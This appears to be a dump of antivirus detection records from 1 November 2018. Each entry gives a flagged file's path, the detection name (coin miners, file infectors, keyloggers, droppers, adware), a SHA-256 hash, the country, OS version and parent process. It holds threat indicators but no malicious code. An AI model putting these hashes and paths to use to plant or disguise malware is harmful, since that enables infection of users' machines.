  Row(detection=Row(filename='avscan-20181101-063157-dde27841', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88b84a21\\AVSCAN-20181101-055743-1315B9BD\\AVSCAN-20181101-063157-DDE27841', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155834-dba36c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155834-DBA36C85', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\system32\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='K:\\HBCD\\Programs\\DRIVERIMPORTPE.EXE', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~ppaf11.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~ppAF11.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:07:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205955-7e8f061a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205751-6D3D76CC\\AVSCAN-20181101-205955-7E8F061A', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Decimation - Realistic Zombie Apocalypse Modpack Modpack 0.82f\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='58cdef157dc3c20a83886f5457e2146c948a5626b599e5cf9761227174740287', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T15:40:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsnB95C.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T13:47:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='C:\\Windows.old.000\\Windows\\System32\\SndVol.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='5ac9bd9a43c94c4a91e800d0d758adb91d82f820c031f6e980f081be0f7ce0fc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:46:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3 - 副本\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='e017ee012e152edbb8db49659c80ace711063322250e732996224c98bdd12016', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112153-4d23bdce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112153-4D23BDCE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='8fee82c5d504d02a5fd0f0a22b3aedcaba38e165dece61c3a55f5485cad201aa', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\90C5F259076E65DBF393768136994F850806D08B149624DFC931E5C31416837C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\2007CAD安装盘\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:51:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b5975e5ab96b9921e42f289876ee815045a8f1d5d18f44f454f00ba425a0d5a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B5975E5AB96B9921E42F289876EE815045A8F1D5D18F44F454F00BA425A0D5A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5975e5ab96b9921e42f289876ee815045a8f1d5d18f44f454f00ba425a0d5a7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_wslewdurit.init', filepath='F:\\_WSLEWDURIT.init', filesize=4000, name='TR/Downloader.Gen.#M300.#R5192'), hash='578d53975c51256b7b4c6080fc46350e51f0e880a641d2151e022ad44f3958aa', metadata=Row(cmdline='_WSLEWDURIT.init,krnl jcs ddhllllddtlptcycygkgkbjxsokogogq', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:43:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d1b758472936b434cf3b9704752e6fc8246ed45d82eb9cc9c617f3145acc5723', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\D1B758472936B434CF3B9704752E6FC8246ED45D82EB9CC9C617F3145ACC5723', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d1b758472936b434cf3b9704752e6fc8246ed45d82eb9cc9c617f3145acc5723', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110827-dfc8b8f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebd8e33d\\AVSCAN-20181101-110433-B6E35AA3\\AVSCAN-20181101-110827-DFC8B8F9', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='75f471467e42326408fc0484d2ff9cf7e39d3ea91f1afa207cd0c7e0acd27334', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-232551-46bbe3f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4552d08\\AVSCAN-20181031-231129-DDA39FCC\\AVSCAN-20181031-232551-46BBE3F5', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='ea3ab3441f0f6b330a73b8cd052afd7641997ad5904987dfb52b074cd3975623', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:49:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152912-4160e362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782bea3d\\AVSCAN-20181101-152455-2082CB32\\AVSCAN-20181101-152912-4160E362', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='5f37114740b39c7aeb1555352790fb9bbedfe4fb7a9127edebd1600ac7703f0d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180755-1b95cce6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13ac220b\\AVSCAN-20181101-180611-14ED7B7E\\AVSCAN-20181101-180755-1B95CCE6', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:52:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rapat 2.exe', filepath='I:\\PPKD\\Rapat 2\\Rapat 2.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R3740'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T02:23:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111235-06cb3b5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111235-06CB3B5C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='waxb503.tmp', filepath='\\\\?\\C:\\Windows\\Temp\\WAXB503.tmp', filesize=10240000, name='HEUR/APC.#M1.#R1'), hash='8389ebae6bdb034985c62aa9abb657916ff4666d322a319f1417cb027547ace5', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:07:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='br.exe', filepath='F:\\New folder\\Corel Draw 12\\Apple\\BR\\BR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000859bf', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000859bf', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2097325.exe', filepath='C:\\SGE\\Modulos\\209\\2097325.exe', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tiWfQf5tMkeelT4g.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231427-04f16cdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47a2b6b6\\AVSCAN-20181101-231323-FC47E95E\\AVSCAN-20181101-231427-04F16CDF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:14:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='H:\\Software\\Adobe CS Master Collection (New)\\Adobe CS4\\AD_Premiere_Pro_CS4 Key\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='H:\\Software\\Adobe CS Master Collection (New)\\Adobe CS4\\AD_Premiere_Pro_CS4 Key\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:30:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\program files\\rhino 6\\system\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T02:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200040-2d586e59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_672bbbb0\\AVSCAN-20181101-195350-F8FADF31\\AVSCAN-20181101-200040-2D586E59', filesize=4224000, name='TR/BProtector.Gen.#M1.#R1'), hash='7c2847d05c2c39f34ec6e826ee8bcb7f7db54bd754d9eb5ddf62d23254142045', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14728.43821\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14728.43821\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:22:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Neuer Ordner\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Neuer Ordner\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:05:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T18:38:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172417-64d479fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d4b9b6a\\AVSCAN-20181101-172407-62E19E4B\\AVSCAN-20181101-172417-64D479FC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:24:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='01dc32bb5cff8356d97f0b514ee316cc1ad67868431970d2e510543ba1390419.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\01DC32BB5CFF8356D97F0B514EE316CC1AD67868431970D2E510543BA1390419.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='01dc32bb5cff8356d97f0b514ee316cc1ad67868431970d2e510543ba1390419', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:13:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000041a5', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000041a5', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\BKP HD PROBLEMA\\Desktop\\Lixo 2\\Desktop 2015\\Programas Eli\\Driver Acer Preto\\Windows 8\\Wireless LAN_Atheros_10.0.0.216_W8x64UW8x86U_A\\WLAN_Atheros_10.0.0.216_W8x86x64\\Install_CD\\setup.exe', filesize=848000, name='W32/Neshta.A.#M1.#R1'), hash='5a34033f3ff1a9efc076e138fedb0cc8b788718a31798ca1b59101523dfd3a60', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='59a195c0972f447161c1d062e3695a34fc0c3b0abd0ab8ee0fd15291cfe251d2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='69b0f5c04b12d3bbabb62464a98b6821d44f5213d738b885f10ff40f4c56808a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:07:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192953-c275cada', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6029ad56\\AVSCAN-20181101-185924-C392C8BC\\AVSCAN-20181101-192953-C275CADA', filesize=64000, name='TR/Patched.Gen2.#M1.#R1'), hash='1c9790fe62c9e1487d4fbdd5084c55e83aa16d0aa2e9df616eec731a1dc19d2a', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:30:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223728-88ba1553', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13c48ddd\\AVSCAN-20181101-223643-7FDC2063\\AVSCAN-20181101-223728-88BA1553', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='javaws.exe', filepath='C:\\Users\\X\\alterland-launcher\\updates\\jre-8u131-win64\\bin\\javaws.exe', filesize=360000, name='W32/Neshta.A.#M1.#R1'), hash='5780857f84d31a0764c9a865bfe936cf45f146db5c69bd9ff5db3b842d5b93a9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:05:49Z'), dt=datetime.date(2018, 11, 1)),
